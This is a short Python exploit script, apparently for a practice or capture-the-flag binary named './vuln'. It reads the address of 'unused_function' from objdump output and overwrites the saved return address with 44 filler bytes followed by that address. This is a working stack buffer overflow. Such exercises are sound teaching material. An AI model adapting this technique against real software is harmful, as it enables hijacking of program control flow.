#!/usr/bin/env python3
import subprocess
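# Look up where objdump places unused_function inside ./vuln, then start
# ./vuln with one argument: filler bytes followed by that address.
print("locating address of unused_function...")
objdump_output = subprocess.check_output(['objdump', '-d', './vuln'], text=True)

for line in objdump_output.splitlines():
    if '<unused_function>:' in line:
        # The first whitespace-separated field of the symbol header line is
        # taken as the address, in hex without a 0x prefix.
        address_hex = line.split()[0]
        # fromhex() yields the most significant byte first; reversing the
        # bytes gives the little-endian order reported below.
        address_bytes = bytes.fromhex(address_hex)[::-1]
        print(f"found address (little endian): {address_bytes!r}")
        break
else:
    # Without this branch a missing symbol only surfaced further down as a
    # NameError on address_bytes; stop here with a message that names the cause.
    raise SystemExit("unused_function not found in objdump output for ./vuln")

# 44 is a hard-coded filler length -- presumably the distance from the input
# buffer to the saved return address in this particular build of ./vuln; it
# depends on compiler and flags, so confirm it against the binary.
payload = b'A' * 44 + address_bytes
subprocess.run(["./vuln", payload])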